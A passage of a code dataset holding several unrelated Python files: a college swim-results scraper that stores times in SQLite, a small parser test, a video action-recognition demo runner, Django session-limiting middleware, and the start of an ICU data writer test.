representing Men's or Women's roster\r\n :return team: a dictionary containing the team name and the names and ID's of all team members from the given season\r\n \"\"\"\r\n team = {}\r\n #gets a list of (Name, swimmer_id) tuples and the team name for a given team_id\r\n url = ROSTER_URL.format(team_id, gender, season)\r\n try: # open the url for the given team_id, season, and gender\r\n page = urllib.request.urlopen(url)\r\n source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e) # otherwise print out the error and return empty tuple\r\n return {}\r\n\r\n soup = BeautifulSoup(source, 'html.parser')\r\n # find the team name from BeautifulSoup\r\n team[\"name\"] = soup.find(\"h1\", class_=\"c-toolbar__title\").text\r\n # find table containing full team roster from BeautifulSoup\r\n table_body = soup.find(\"table\", class_=\"c-table-clean c-table-clean--middle c-table-clean--fixed table table-hover\").tbody\r\n team[\"roster\"] = []\r\n # add team member names and ids to team dict\r\n for tableRow in table_body.find_all(\"tr\"):\r\n swimmer_id = tableRow.td.a[\"href\"].split(\"/\")[-1]\r\n swimmer_name = normalize_name(str(tableRow.td.strong.text))\r\n team[\"roster\"].append((swimmer_name, swimmer_id))\r\n return team\r\n\r\n\r\ndef get_team_results(team_id, season):\r\n \"\"\"\r\n :param team_id: integer id of the team to collect meets for (e.g. 184)\r\n :param season: string season from which you are collecting meets (e.g. 
\"2018-2019\")\r\n :return meets: dictionary of meet ids, names, and dates (for the purpose of filling in date slot in relays)\r\n \"\"\"\r\n url = RESULTS_URL.format(team_id, season)\r\n try: # open url for page containing all meets that given team participated in during given season\r\n page = urllib.request.urlopen(url)\r\n source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e) # otherwise print out the error and return empty tuple\r\n return {}\r\n\r\n soup = BeautifulSoup(source, 'html.parser')\r\n print(\"getting meets for team {} during season {}\".format(team_id, season))\r\n # meets[\"team_name\"] = soup.find(\"h1\", class_=\"c-toolbar__title\").text\r\n\r\n meets = {}\r\n meet_list = soup.find(\"section\", class_=\"c-list-grid\") # find list of meets team participated in\r\n # Add individual meets and data about them to meets dictionary\r\n for meet in meet_list.find_all(\"a\"):\r\n meet_id = meet[\"href\"].split(\"/\")[-1]\r\n meet_name = meet.find(\"h3\").text\r\n meet_submitted = \"Completed\" in meet.find(\"ul\",\r\n class_=\"c-list-grid__meta o-list-inline o-list-inline--dotted\").text\r\n print(\"If no data is being collected from meets for relays, it may be because the \\\"Completed\\\" \"\r\n \"tag is no longer in use\")\r\n split_date = meet.find(\"time\")[\"datetime\"].split(\"-\")\r\n meet_date = convert_to_time(int(split_date[0]), int(split_date[1]), int(split_date[2]))\r\n\r\n meets[meet_id] = {\"meet_name\": meet_name, \"meet_date\": meet_date, \"submitted\": meet_submitted}\r\n print(meets)\r\n return meets\r\n\r\n\r\ndef get_meet_event_ids(meet, gender):\r\n \"\"\"\r\n :param meet: unique integer ID representing a meet\r\n :param gender: character M,F,X representing gender (male, female, mixed) to get events for\r\n :return event_id_dict: dictionary of event id's to event names for given meet\r\n #TODO: get this to work without a gender input\r\n #NOTE: if gender is not specified, it goes to a default gender (or last one you looked at on any page)\r\n # if a gender IS specified but it isn't in that meet, it will instead load W, M, or X (in that order)\r\n # simple solution is to just load page three times and live with time wasted overwriting dictionary values\r\n \"\"\"\r\n url = MEET_URL.format(meet, gender)\r\n try: # open url for given meet looking at results for gender\r\n page = urllib.request.urlopen(url)\r\n source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e) # otherwise print out the error and return empty tuple\r\n return {}\r\n\r\n soup = BeautifulSoup(source, 'html.parser')\r\n print(\"getting event_ids for meet {} for gender {}\".format(meet, gender))\r\n # meets[\"team_name\"] = soup.find(\"h1\", class_=\"c-toolbar__title\").text\r\n\r\n event_id_dict = {}\r\n # Find list of all events from meet for given gender\r\n event_list = soup.find(\"ul\", class_=\"c-sticky-filters__list o-list-block o-list-block--divided js-max-height\")\r\n if event_list is not None:\r\n # add all events from the meet to event_id_dict\r\n for event in event_list.find_all(\"div\", class_=\"o-media o-media--flush\"):\r\n event = event.find(\"div\", title=\"Completed\")\r\n event_id = int(re.sub(\"[^0-9]\", \"\", event.text))\r\n event_name = event.find_next_sibling(\"div\").text\r\n event_id_dict[event_name] = event_id\r\n print(event_id_dict)\r\n return event_id_dict\r\n else:\r\n print(\"meet {} not submitted\".format(meet))\r\n return {\"MEET NOT SUBMITTED\": 0}\r\n\r\n\r\n# you could also do this by looking it up by team, then 
you just have to visit every meet.\r\ndef get_relay_leg_times(team_id, meet_id, relay_id):\r\n \"\"\"\r\n :param team_id: the team whose data you want to collect for the given relay event\r\n :param meet_id: the id of the meet they competed in\r\n :param relay_id: the id for the relay event at that particular meet\r\n :return relay_leg_times:\r\n \"\"\"\r\n # get IDs of the swimmers on a university's relay team(s)\r\n url = MEET_EVENT_URL.format(meet_id, relay_id)\r\n try: # open url for results of the relay in the meet designated by meet_id and relay_id\r\n page = urllib.request.urlopen(url)\r\n source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e) # otherwise print out the error and return empty tuple\r\n return ([],[])\r\n soup = BeautifulSoup(source, \"html.parser\")\r\n\r\n swimmer_id_list = []\r\n times = []\r\n # find all times that team_id is mentioned in BeautifulSoup\r\n team_instances = soup.find_all(\"a\", href=\"/team/{}\".format(team_id)) # find out actual name for relay teams\r\n # get relay leg times by relay team (note that all relay teams checked are from same main team)\r\n for team in team_instances:\r\n if len(team.attrs) == 2: # team names are mentioned multiple times in each row, check for correct column\r\n # if a team was disqualified, skip it\r\n if \"DQ\" in team.find_parent('td').find_next_sibling().text:\r\n print(\"excluding disqualified team.\")\r\n continue\r\n\r\n # get list of all 4 swimmers on relay team\r\n table_soup = team.find_next_sibling('ol')\r\n for swimmer in table_soup.find_all('a'):\r\n swimmer_id_list.append(swimmer['href'].split('/')[2])\r\n\r\n # get the split times of the 4 swimmers on a relay team\r\n splash_split_id = team.find_parent('td').find_next_sibling().find('abbr')['id'][4:]\r\n splash_splits_url = SPLASH_SPLITS_URL.format(splash_split_id)\r\n try: # open url with table of relay split time table\r\n page = urllib.request.urlopen(splash_splits_url)\r\n splash_source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e) # otherwise print out the error and return empty tuple\r\n return ([],[])\r\n\r\n # add split times, if they were recorded\r\n # NOTE: this might be an issue if names are available but not splits. see if this is a possible situation\r\n splash_soup = BeautifulSoup(splash_source,\"html.parser\").tbody\r\n if splash_soup is None:\r\n print(\"no splits available for meet {}\".format(meet_id))\r\n return []\r\n for row in splash_soup.find_all(\"tr\"):\r\n if row.find_all(\"td\")[-1].text[0].isdigit(): # in relays longer than 200Y, not all rows have leg times.\r\n times.append(row.find_all(\"td\")[-1].text) # this is the leg time for a given swimmer.\r\n else:\r\n continue\r\n print(swimmer_id_list)\r\n print(times)\r\n relay_leg_times = list(zip(swimmer_id_list, times))\r\n return relay_leg_times\r\n\r\n\r\ndef get_relay_swim_data(team_to_pull, gender_to_pull, season_to_pull, relays_to_pull):\r\n \"\"\"\r\n :param team_to_pull: the ID number of the team whose data is being collected\r\n :param gender_to_pull: a character M,F,X representing Male, Female, or Mixed\r\n :param season_to_pull: a string representing the season/year the data is being pulled from\r\n :param relays_to_pull: List of relay events to pull. (e.g. 
MM200 = Men's 200 Yard Medley Relay)\r\n    :return relay_swims: 2D list where rows are individual swims and columns are in following format:\r\n    [swimmer_id, team_id, time, 0, meet_id, gender, event_code, date, 0, snapshot_id]\r\n    which is identical to the format in which new rows are added to swims table\r\n    \"\"\"\r\n    # used to differentiate between relay teams within a team\r\n    team_letter = {0: \"A\", 1: \"B\", 2: \"C\", 3: \"D\", 4: \"E\", 5: \"F\"}\r\n\r\n    # Event is a medley relay, so names relay legs accordingly as events and appends them to relay_swims\r\n    def medley():\r\n        medley_leg_dict = {0: \"LM\", 1: \"2M\", 2: \"3M\", 3: \"4M\"}\r\n        for i in range(len(relay_results)):\r\n            # NOTE: This assumes teams place exactly as planned\r\n            medley_leg_name = medley_leg_dict[i%4] + str(int(relay_string[1:-1])//4) + team_letter[i//4]\r\n            relay_swims.append([relay_results[i][0], team_to_pull, relay_results[i][1], 0, meet_id, gender_to_pull,\r\n                                medley_leg_name, meets[meet_id][\"meet_date\"]])\r\n\r\n    # Event is freestyle relay, so names relay legs accordingly as events and appends them to relay_swims\r\n    def freestyle():\r\n        for i in range(len(relay_results)):\r\n            if i % 4 != 0:\r\n                # NOTE: This assumes teams place exactly as planned\r\n                freestyle_leg_name = \"1F\" + str(int(relay_string[1:-1])//4) + team_letter[i//4]\r\n            else:\r\n                freestyle_leg_name = \"LF\" + str(int(relay_string[1:-1])//4) + team_letter[i//4]\r\n\r\n            relay_swims.append([relay_results[i][0], team_to_pull, relay_results[i][1], 0, meet_id, gender_to_pull,\r\n                                freestyle_leg_name, meets[meet_id][\"meet_date\"]])\r\n\r\n    relay_swims = []\r\n\r\n    # get full dictionary of meets and their data\r\n    meets = get_team_results(team_to_pull, season_to_pull) # can have this work the same way that get_swim_data does later if that helps\r\n    list_of_meets = list(meets.keys())\r\n\r\n    for meet_id in list_of_meets:\r\n        if meets[meet_id][\"submitted\"]:\r\n            # add \"events\" key to meets, containing all events in meet that gender_to_pull participated in\r\n            meets[meet_id][\"events\"] = get_meet_event_ids(meet_id, gender_to_pull)\r\n            # add data on all relay types in relays_to_pull to relay_swims\r\n            for relay_string in relays_to_pull:\r\n                event_name = to_event_title(gender_to_pull + relay_string)\r\n                if event_name in meets[meet_id][\"events\"]:\r\n                    # get all relay leg times for team_to_pull in meet meet_id for relay relay_string\r\n                    relay_results = get_relay_leg_times(team_to_pull, meet_id, meets[meet_id][\"events\"][event_name])\r\n                    # string equality must use ==, not the identity operator \"is\"\r\n                    if relay_string[0] == \"M\":\r\n                        medley()\r\n                    elif relay_string[0] == \"F\":\r\n                        freestyle()\r\n        else:\r\n            print(\"Results for {} not submitted\".format(meets[meet_id][\"meet_name\"]))\r\n    return relay_swims, meets # NOTE: can add meets as a return value to use it to make meets database table\r\n\r\n\r\ndef get_swim_data(teams_to_pull, genders_to_pull,\r\n                  year_start, year_end,\r\n                  events_to_pull=DEFAULT_EVENTS_TO_PULL,\r\n                  database_file_name=DATABASE_FILE_NAME):\r\n    \"\"\"\r\n    :param teams_to_pull: List of strings where each string is a swim team (e.g. \"Bucknell University\")\r\n    :param genders_to_pull: List of characters M, F, representing Male and Female\r\n    :param year_start: Integer value of year to start pulling data from\r\n    :param year_end: Integer value of final year for data pull\r\n    :param events_to_pull: List of event codes for events to pull data on\r\n    :param database_file_name: The name of the database file that information will be stored in\r\n
    :return: Nothing is returned. database_file_name will have data written to it, and will be created if it didn't\r\n        exist before.\r\n    \"\"\"\r\n\r\n    # remove relays from events_to_pull for later/separate processing.\r\n    # NOTE: iterate over a copy; removing items from the list being iterated\r\n    # would silently skip the element after each removal.\r\n    relays_to_pull = []\r\n    for event in list(events_to_pull):\r\n        if event[0] in \"MF\":\r\n            events_to_pull.remove(event)\r\n            relays_to_pull.append(event)\r\n\r\n    # Convert team_dict entries to integer team ID's.\r\n    for team in range(len(teams_to_pull)):\r\n        teams_to_pull[team] = TEAM_DICT[teams_to_pull[team]]\r\n\r\n    # open the sqlite database\r\n    connection = sqlite3.connect(database_file_name)\r\n    cursor = connection.cursor()\r\n\r\n    # add information about this snapshot to the Snapshots table (and create it if it doesn't exist)\r\n    cursor.execute(CREATE_SNAPSHOT_TABLE_COMMAND)\r\n    snapshot_id = random.randint(0, 4294967295) # random 32-bit id; collisions are unlikely but possible << NOTE: change this\r\n\r\n    # create a Snapshot entry of the new data being pulled. This is essentially a changelog\r\n    date_range_string = \"{0}.{1}.{2}-{3}.{1}.{2}\".format(year_start, SEASON_LINE_MONTH, SEASON_LINE_DAY, year_end)\r\n    teams_string = \",\".join(str(team) for team in teams_to_pull)\r\n    events_string = \",\".join(events_to_pull)\r\n    cursor.execute(INSERT_SNAPSHOT_COMMAND.format(snapshot_id, date_range_string, teams_string, events_string))\r\n\r\n    # ensure the existence of each event table and the Teams/Swimmers tables\r\n    cursor.execute(CREATE_SWIMS_TABLE)\r\n    cursor.execute(CREATE_SWIMMER_TABLE.format(\"Swimmers\"))\r\n    cursor.execute(CREATE_TEAM_TABLE.format(\"Teams\"))\r\n    cursor.execute(CREATE_MEET_TABLE)\r\n    \r\n    # retrieve and add the times to the database\r\n    for simple_year in range(year_start, year_end): # for each competition year, do the following\r\n        # THIS IS WHERE SEASON STRING IS MADE AND ROSTER URL BUILDING IS STARTED\r\n        season_string = simple_year - 1996  # numeric season id; the old method was str(simple_year) + \"-\" + str(simple_year + 1)\r\n        print(\"Collecting Season {}\".format(season_string))\r\n        search_start_timestamp = convert_to_time(int(simple_year), SEASON_LINE_MONTH, SEASON_LINE_DAY)\r\n        search_end_timestamp = convert_to_time(int(simple_year) + 1, SEASON_LINE_MONTH, SEASON_LINE_DAY)\r\n\r\n        team_counter = 0\r\n        percent = 0\r\n        for team_id in teams_to_pull: # for each team\r\n            for gender in genders_to_pull: # for each gender\r\n                # pull the roster for this season and gender\r\n                team = get_roster(team_id, season_string, gender)\r\n                print(team)\r\n                # add team to the Teams table\r\n                if team[\"name\"] != \"\": # if there wasn't a 404 error, check if there is existing data on team\r\n                    matches = cursor.execute(CHECK_TEAM_TABLE.format(\"Teams\", team_id))\r\n                    if matches.fetchone() is None: # if there are no duplicates, add the team to team table\r\n                        cursor.execute(ADD_TO_TEAM_TABLE.format(\"Teams\", team[\"name\"], team_id))\r\n                for index, swimmer in enumerate(team[\"roster\"]):\r\n                    print(swimmer[0] + \" \" + swimmer[1]) # for each swimmer on the team\r\n\r\n                    # enumerate this loop to have an index for the loading bar\r\n                    percent_of_team = float(index) / float(len(team[\"roster\"]))\r\n                    show_loading_bar(percent + (percent_of_team / float(len(teams_to_pull))))\r\n\r\n                    # add the swimmer to the Swimmers table, if they aren't there already\r\n                    matches = cursor.execute(CHECK_SWIMMER_TABLE.format(\"Swimmers\", swimmer[1]))\r\n                    if matches.fetchone() is None:\r\n                        cursor.execute(ADD_TO_SWIMMER_TABLE.format(\"Swimmers\", sqlsafe(swimmer[0]), gender, swimmer[1], team_id))\r\n                    # Add all of this swimmer's swim data for this season to the 
swims table, for the events requested\r\n for event in events_to_pull: # pull swim data for requested events\r\n print(swimmer[1] + \" \" + event)\r\n swims = request_swimmer(swimmer[1], event, search_start_timestamp, search_end_timestamp)\r\n sys.stdout.flush()\r\n # Add swims to Swims table\r\n for swim in swims:\r\n command = INSERT_SWIM_COMMAND.format(swimmer[1], team_id, swim[1], 0, swim[2], gender, event, swim[0], 0, snapshot_id)\r\n cursor.execute(command)\r\n\r\n # Retrieve relay swim data and data on meets that team team_id competed in\r\n relay_swims, meets = get_relay_swim_data(team_id, gender, season_string, relays_to_pull)\r\n\r\n # Add relay swim data to database swims table\r\n for relay_swim in relay_swims:\r\n relay_command = INSERT_SWIM_COMMAND.format(relay_swim[0],relay_swim[1],relay_swim[2],0,\r\n relay_swim[4], relay_swim[5], relay_swim[6],\r\n relay_swim[7], 0, snapshot_id)\r\n cursor.execute(relay_command)\r\n\r\n # Add meet data to database meets table\r\n # NOTE: Meets table still hasn't been pulled/created yet, if get_swim_data fails try commenting out this\r\n #for meet in meets:\r\n # matches = cursor.execute(CHECK_MEET_TABLE.format(meet))\r\n # if matches.fetchone() is None:\r\n # meet_command = INSERT_MEET_COMMAND.format(meet, meets[meet][\"meet_name\"],\r\n # meets[meet][\"meet_date\"],\r\n # meets[meet][\"submitted\"])\r\n # cursor.execute(meet_command)\r\n\r\n # print the loading bar\r\n team_counter += 1\r\n percent = float(team_counter) / float(len(teams_to_pull))\r\n show_loading_bar(percent)\r\n\r\n connection.commit()\r\n\r\n ####################################################################################################################\r\n # REMAINDER OF CODE HERE ISN'T USED FOR OUR PURPOSES #\r\n # this code doesn't work for relay swims #\r\n ####################################################################################################################\r\n\r\n get_event_times = \"SELECT time FROM Swims WHERE event='{}{}' AND date>{} AND date<{}\"\r\n update_with_scaled = \"UPDATE Swims SET scaled={} WHERE event='{}{}' AND date>{} AND date<{} AND time={}\"\r\n # fill out the scaled column\r\n print(\"Scaling times\")\r\n # convert each swim to a season z-score\r\n for simple_year in range(year_start, year_end):\r\n season_start_timestamp = convert_to_time(int(simple_year), SEASON_LINE_MONTH, SEASON_LINE_DAY)\r\n season_end_timestamp = convert_to_time(int(simple_year) + 1, SEASON_LINE_MONTH, SEASON_LINE_DAY)\r\n for event in events_to_pull:\r\n for gender in genders_to_pull:\r\n # calculate average times for each event by gender\r\n cursor.execute(get_event_times.format(gender, event, season_start_timestamp, season_end_timestamp))\r\n times = [x[0] for x in cursor.fetchall()]\r\n try:\r\n average = sum(times) / len(times)\r\n except ZeroDivisionError as e:\r\n print(\"No data was available on event {}\".format(event))\r\n continue\r\n print(\"average for {}{} in {}: {}\".format(gender, event, simple_year, average))\r\n # calculate z-score of times scored for this event-gender pairing\r\n sd = (sum([(x - average)**2 for x in times]) / len(times)) ** .5 # standard deviation\r\n update_list = [(x, (x - average) / sd) for x in times]\r\n for update in update_list:\r\n command = update_with_scaled.format(update[1], gender, event, season_start_timestamp,\r\n season_end_timestamp, update[0])\r\n cursor.execute(command)\r\n connection.commit()\r\n print(\"scaled\")\r\n\r\n print(\"\\nFinding taper swims\")\r\n for simple_year in range(year_start, 
year_end):\r\n        season_start_timestamp = convert_to_time(int(simple_year), SEASON_LINE_MONTH, SEASON_LINE_DAY)\r\n        season_end_timestamp = convert_to_time(int(simple_year) + 1, SEASON_LINE_MONTH, SEASON_LINE_DAY)\r\n        print(\"Season {}-{}\".format(simple_year, simple_year + 1))\r\n        print(\"From timestamp {} to {}\".format(season_start_timestamp, season_end_timestamp))\r\n        for team_id in teams_to_pull:\r\n            # get a list of all the days this team swam\r\n            cursor.execute(\"SELECT date FROM Swims WHERE team={} AND date>{} AND date<{}\".format(team_id,\r\n                                                                                                 season_start_timestamp,\r\n                                                                                                 season_end_timestamp))\r\n            dates = cursor.fetchall()\r\n            dates = list(set(dates)) # this removes duplicates, which there are many\r\n            meet_scores = [] # populate this with\r\n            average_score = 0\r\n            for date in dates:\r\n                # first check if only one swimmer swam. this is indicative of a glitch where I\r\n                # cannot isolate which roster a swimmer is in if they switched team.\r\n                cursor.execute(\"SELECT count(*) FROM Swims WHERE team={} AND date={}\".format(team_id, date[0]))\r\n                if cursor.fetchone()[0] != 7:\r\n                    # get the average scaled time for this day of swimming and add it to the list\r\n                    cursor.execute(\"SELECT avg(scaled) FROM Swims WHERE team={} AND date={}\".format(team_id, date[0]))\r\n                    meet_tuple = (cursor.fetchone()[0], date[0])\r\n                    average_score += meet_tuple[0]\r\n                    meet_scores.append(meet_tuple)\r\n            average_score /= len(dates)\r\n            for date in meet_scores:\r\n                # a taper swim is a swim at a meet with a below average z-score for that season\r\n                # this can be assumed because, given that a team has dual meets and taper meets\r\n                # online, there will be a two-node normal distribution. the lower node contains\r\n                # taper swims. we'll now update them in the database\r\n                # Brad's interpretation of this:\r\n                # If a swim was better than team average, give taper of 1, otherwise set taper to 2\r\n                if date[0] < average_score:\r\n                    cursor.execute(\"UPDATE Swims SET taper=1 WHERE team={} AND date={}\".format(team_id, date[1]))\r\n                else:\r\n                    cursor.execute(\"UPDATE Swims SET taper=2 WHERE team={} AND date={}\".format(team_id, date[1]))\r\n\r\n    print(\"Finding outliers\")\r\n    cursor.execute(\"UPDATE Swims SET taper=3 WHERE scaled>3\") # a lazy solution. I'm tired << let's fix that\r\n\r\n    connection.commit()\r\n    connection.close()\r\n\r\n\r\n# This function is meant for letting you choose the inputs that are used when calling get_swim_data. Feel free to mess\r\n# with it as you like\r\ndef inputs_for_swim_data_search(all_default=False):\r\n    \"\"\"\r\n    allows you to input values for get_swim_data as you like. if all_default is True the default values listed in\r\n    constants.py are used; if it is False you are prompted for each value manually.\r\n    \"\"\"\r\n    if all_default:\r\n        events_to_pull = DEFAULT_EVENTS_TO_PULL\r\n        genders_to_pull = DEFAULT_GENDER\r\n        teams_to_pull = DEFAULT_TEAMS_TO_PULL\r\n        year_start = DEFAULT_YEAR_START\r\n        year_end = DEFAULT_YEAR_END\r\n        database_file_name = DATABASE_FILE_NAME\r\n    else:\r\n        database_file_name = input(\"Use default database file? Y/N \")\r\n        if database_file_name == \"Y\":\r\n            database_file_name = DATABASE_FILE_NAME\r\n        else:\r\n            database_file_name = input(\"Type database file name here: \")\r\n        # events_to_pull = input(\"Which events would you like to pull information on? Separate with spaces please \").split()\r\n        teams_to_pull = []\r\n        temp_val = input(\"Input colleges whose teams you would like to pull one at a time. \"\r\n                         \"Hit \\\"return\\\" after each entry.\\n1. \")\r\n        while temp_val.lower() != \"done\":  # the original (\"done\" or \"Done\") expression only ever compared against \"done\"\r\n            teams_to_pull.append(temp_val)\r\n            temp_val = input(\"\\n{}. \".format(len(teams_to_pull)+1))\r\n        genders_to_pull = input(\"M, F, or M F? \").split()\r\n        year_start = int(input(\"Input start year: \"))  # int() instead of eval(): eval on raw input is unsafe\r\n        year_end = int(input(\"Input end year: \"))\r\n        events_to_pull = DEFAULT_EVENTS_TO_PULL\r\n    return get_swim_data(teams_to_pull, genders_to_pull, year_start, year_end, events_to_pull, database_file_name)\r\n\r\n\r\ndef main():\r\n    inputs_for_swim_data_search(True)\r\n\r\n\r\nmain()\r\n","sub_path":"get_swim_data.py","file_name":"get_swim_data.py","file_ext":"py","file_size_in_byte":30207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"80446565","text":"import Lab1.parser.counter as counter\nimport Lab1.parser.words as xml\nimport Lab1.parser.request as request\nimport os\n\n\ndef parse_links_test():\n    parsed_links = xml.parse_links(os.path.join(os.getcwd(), 'Lab1', 'test', 'links.file_reader'))\n    expected_test_links = ['https://www.python.org/', 'https://nodejs.org', 'https://github.com/']\n    assert len(parsed_links) == 3, 'Count of parsed links from file: \"links.file_reader\" is not equal with expected count'\n    assert parsed_links[0] == expected_test_links[0], 'First link parsed from file is not equal with expected link'\n    assert parsed_links[1] == expected_test_links[1], 'Second link parsed from file is not equal with expected link'\n    assert parsed_links[2] == expected_test_links[2], 'Third link parsed from file is not equal with expected link'\n    return '\\tfile_reader.file_reader.parse_links test'\n\n\ndef write_words_test():\n    initial_content = request.read_links(['https://raw.githubusercontent.com/kirick1/cse/master/Lab1/test/test.txt'])\n    counted_initial_content = counter.count_words(initial_content)\n    xml.write_words(counted_initial_content, os.path.join(os.getcwd(), 'Lab1', 'test', 'counted.file_reader'))\n    return '\\tfile_reader.file_reader.write_words test'\n","sub_path":"Lab1/test/xml_test.py","file_name":"xml_test.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"101228044","text":"#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\n\nimport numpy as np\nimport queue\nimport cv2\nimport torch\nimport tqdm\n\nfrom slowfast.utils import logging\nfrom slowfast.visualization.async_predictor import (\n    AsycnActionPredictor,\n    AsyncVis,\n)\nfrom slowfast.visualization.ava_demo_precomputed_boxes import (\n    AVAVisualizerWithPrecomputedBox,\n)\nfrom slowfast.visualization.demo_loader import VideoReader\nfrom slowfast.visualization.predictor import ActionPredictor\nfrom slowfast.visualization.video_visualizer import VideoVisualizer\n\nlogger = logging.get_logger(__name__)\n\n\ndef run_demo(cfg, frame_provider):\n    \"\"\"\n    Run demo visualization.\n    Args:\n        cfg (CfgNode): configs. 
Details can be found in\n slowfast/config/defaults.py\n frame_provider (iterator): Python iterator that return task objects that are filled\n with necessary information such as `frames`, `id` and `num_buffer_frames` for the\n prediction and visualization pipeline.\n \"\"\"\n # Set random seed from configs.\n np.random.seed(cfg.RNG_SEED)\n torch.manual_seed(cfg.RNG_SEED)\n # Setup logging format.\n logging.setup_logging(cfg.OUTPUT_DIR)\n # Print config.\n logger.info(\"Run demo with config:\")\n logger.info(cfg)\n\n common_classes = (\n cfg.DEMO.COMMON_CLASS_NAMES\n if len(cfg.DEMO.LABEL_FILE_PATH) != 0\n else None\n )\n\n video_vis = VideoVisualizer(\n num_classes=cfg.MODEL.NUM_CLASSES,\n class_names_path=cfg.DEMO.LABEL_FILE_PATH,\n top_k=cfg.TENSORBOARD.MODEL_VIS.TOPK_PREDS,\n thres=cfg.DEMO.COMMON_CLASS_THRES,\n lower_thres=cfg.DEMO.UNCOMMON_CLASS_THRES,\n common_class_names=common_classes,\n colormap=cfg.TENSORBOARD.MODEL_VIS.COLORMAP,\n mode=cfg.DEMO.VIS_MODE,\n )\n\n async_vis = AsyncVis(video_vis, n_workers=cfg.DEMO.NUM_VIS_INSTANCES)\n\n if cfg.NUM_GPUS <= 1:\n model = ActionPredictor(cfg=cfg, async_vis=async_vis)\n else:\n model = AsycnActionPredictor(cfg, async_vis.task_queue)\n\n seq_len = cfg.DATA.NUM_FRAMES * cfg.DATA.SAMPLING_RATE\n\n assert (\n cfg.DEMO.BUFFER_SIZE <= seq_len // 2\n ), \"Buffer size cannot be greater than half of sequence length.\"\n num_task = 0\n for able_to_read, task in frame_provider:\n if not able_to_read:\n break\n num_task += 1\n\n model.put(task)\n\n try:\n frames = async_vis.get()\n num_task -= 1\n yield frames\n except queue.Empty:\n continue\n # hit Esc to quit the demo.\n key = cv2.waitKey(1)\n if key == 27:\n break\n\n while num_task != 0:\n try:\n frames = async_vis.get()\n num_task -= 1\n yield frames\n except queue.Empty:\n continue\n # hit Esc to quit the demo.\n key = cv2.waitKey(1)\n if key == 27:\n break\n\n\ndef demo(cfg):\n \"\"\"\n Run inference on an input video or stream from webcam.\n Args:\n cfg (CfgNode): configs. 
Details can be found in\n slowfast/config/defaults.py\n \"\"\"\n # AVA format-specific visualization with precomputed boxes.\n if cfg.DETECTION.ENABLE and cfg.DEMO.PREDS_BOXES != \"\":\n precomputed_box_vis = AVAVisualizerWithPrecomputedBox(cfg)\n precomputed_box_vis()\n else:\n frame_provider = VideoReader(cfg)\n\n for frames in tqdm.tqdm(run_demo(cfg, frame_provider)):\n for frame in frames:\n frame_provider.display(frame)\n frame_provider.clean()\n","sub_path":"tools/demo_net.py","file_name":"demo_net.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"565358483","text":"# Python's Libraries\nimport time\nimport pytz\nfrom datetime import datetime\n\n# Django's Libraries\nfrom django.conf import settings\nfrom django.contrib.auth.views import redirect_to_login\nfrom django.contrib.sessions.models import Session\nfrom django.core.exceptions import ObjectDoesNotExist\n\ntry:\n from django.utils.deprecation import MiddlewareMixin\nexcept ImportError:\n MiddlewareMixin = object\n\nSESSION_TIMEOUT_KEY = \"_session_init_timestamp_\"\n\n\nclass SessionControlMiddleware(MiddlewareMixin):\n def process_request(self, request):\n if not hasattr(request, \"session\") or request.session.is_empty():\n return\n\n init_time = request.session.setdefault(\n SESSION_TIMEOUT_KEY, time.time()\n )\n\n expire_seconds = getattr(\n settings, \"SESSION_EXPIRE_SECONDS\", settings.SESSION_COOKIE_AGE\n )\n\n session_is_expired = time.time() - init_time > expire_seconds\n\n if session_is_expired:\n request.session.flush()\n return redirect_to_login(next=request.path)\n\n expire_since_last_activity = getattr(\n settings, \"SESSION_EXPIRE_AFTER_LAST_ACTIVITY\", False\n )\n grace_period = getattr(\n settings, \"SESSION_EXPIRE_AFTER_LAST_ACTIVITY_GRACE_PERIOD\", 1\n )\n\n if expire_since_last_activity \\\n and time.time() - init_time > grace_period:\n request.session[SESSION_TIMEOUT_KEY] = time.time()\n\n\nclass OnlyOneSessionMiddleware:\n\n # Called only once when the web server starts\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n # Code to be executed for each request before\n # the view (and later middleware) are called.\n if request.user.is_authenticated:\n stored_session_key = request.user.session_key\n\n # if there is a stored_session_key in our database and it is\n # different from the current session, delete the stored_session_key\n # session_key with from the Session table\n if stored_session_key \\\n and stored_session_key \\\n != request.session.session_key:\n try:\n session = Session.objects.get(\n session_key=stored_session_key\n )\n session.delete()\n except ObjectDoesNotExist:\n print(\"No existe sesión activa\")\n\n request.user.session_key = \\\n request.session.session_key\n\n request.user.last_activity = \\\n datetime.fromtimestamp(\n request.session[SESSION_TIMEOUT_KEY],\n tz=pytz.utc\n )\n\n request.user.save()\n print(\"Se crea sessión\")\n\n response = self.get_response(request)\n\n # This is where you add any extra code to be executed for each request/response after\n # the view is called.\n # For this tutorial, we're not adding any code so we just return the response\n\n return response\n","sub_path":"Utils/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"130093079","text":"# Imports: standard 
library\nfrom typing import List, Tuple\n\n# Imports: third party\nimport h5py\nimport numpy as np\nimport pytest\n\n# Imports: first party\nfrom ingest.icu.writers import Writer\nfrom tensorize.edw.data_objects import EDWType, ICUDataObject\nfrom tensorize.bedmaster.data_objects import BedmasterType\n\n# pylint: disable=protected-access\n\n\ndef get_visit_id() -> str:\n return str(np.random.randint(1000000000, 9999999999))\n\n\ndef get_attributes(signal: ICUDataObject) -> Tuple[List[str], List[str]]:\n signal_keys = [attr for attr in dir(signal) if not attr.startswith(\"_\")]\n array_keys = [\n attr\n for attr in signal_keys\n if isinstance(getattr(signal, attr), (np.ndarray, dict))\n ]\n attr_keys = list(set(signal_keys) - set(array_keys))\n return array_keys, attr_keys\n\n\ndef test_set_visit_id(temp_file, fake_signal):\n static_data = fake_signal.get_static_data()\n measurement = fake_signal.get_measurement()\n\n expected_error_message = \"Visit ID not found. Please, check that you have set one.\"\n\n visit_id = get_visit_id()\n with Writer(temp_file.name, visit_id=visit_id) as 